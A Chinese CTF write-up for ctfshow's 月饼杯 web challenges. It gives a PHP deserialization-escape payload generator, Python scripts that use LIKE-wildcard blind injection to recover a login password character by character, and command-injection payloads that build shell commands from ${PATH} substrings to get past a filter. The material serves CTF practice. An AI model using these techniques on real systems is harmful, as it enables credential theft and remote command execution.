ctfshow_月饼杯

文章目录

0x01 web1_此夜圆 (反序列化逃逸)

下载附件拿到源码,是反序列化逃逸的题

懒得算,直接遍历Firebasky的数量

<?php
error_reporting(0);
class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				echo "success!";	
			}
			else
			{
				echo 'wrong password';
			}
	}
}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}
$o = new a("test",1);
$encode = filter(serialize($o));
echo "正常格式:".$encode."\n";
//遍历payload:Firebasky乘以i加";s:8:"password";s:5:"yu22x";}
for ($i=0; $i < 40; $i++) { 
	$payload = str_repeat("Firebasky",$i).'";s:8:"password";s:5:"yu22x";}';
	$o = new a($payload,1);
	$encode = filter(serialize($o));
	$decode = unserialize($encode);
	if($decode->password=="yu22x"){
		echo "\npayload为:".$payload;
	}
}

结果:

正常格式:O:1:"a":2:{s:5:"uname";s:4:"test";s:8:"password";i:1;}
wrong passwordflag
payload为:FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}[Finished in 0.1s]

ctfshow_月饼杯

0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母)

在登录页面的源代码中可以看到一些提示
ctfshow_月饼杯
用户名为yu22x,查询语句为like,可以使用通配符%_

百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。

fuzz了一下,被过滤的有这些字符,%号被过滤了,我们可以使用_
ctfshow_月饼杯

写个脚本测试一下密码长度

import requests

headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
data = {
    "username": "yu22x",
    "password": "{0}"
}
req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("a")})
print(len(req.text))
for i in range(1, 50):
    req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("_" * i)})
    if len(req.text) != 52:
        print("[+] 长度为", i)

长度为32
ctfshow_月饼杯
然后用32个_去登录,yu22x________________________________

I have filtered all the characters. Why can you come in? get out!

看来是必须用真实的密码登录,写个脚本跑一下

import requests

headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
data = {
    "username": "yu22x",
    "password": "{0}"
}
fuzz = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
res = ""
for i in range(32):
    for j in fuzz:
        req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format(res+j+"_"*(31-i))})
        # print(res+j+"_"*(32-i))
        if "wrong" not in req.text:
            res += j
            print(res)
            break

得到密码67815b0c009ee970fe4014abaa3Fa6A0
ctfshow_月饼杯
然后后面的都没想到,最开始还以为是ssrf,看了题解才知道怎么做

ctfshow_月饼杯
ctfshow_月饼杯

利用环境变量构造ls

0;${PATH:5:1}${PATH:11:1}

ctfshow_月饼杯
构造nl
ctfshow_月饼杯

0;${PATH:14:1}${PATH:5:1} ????.???
上一篇:ctfshow misc3


下一篇:CTFSHOW-日刷-[月饼杯]web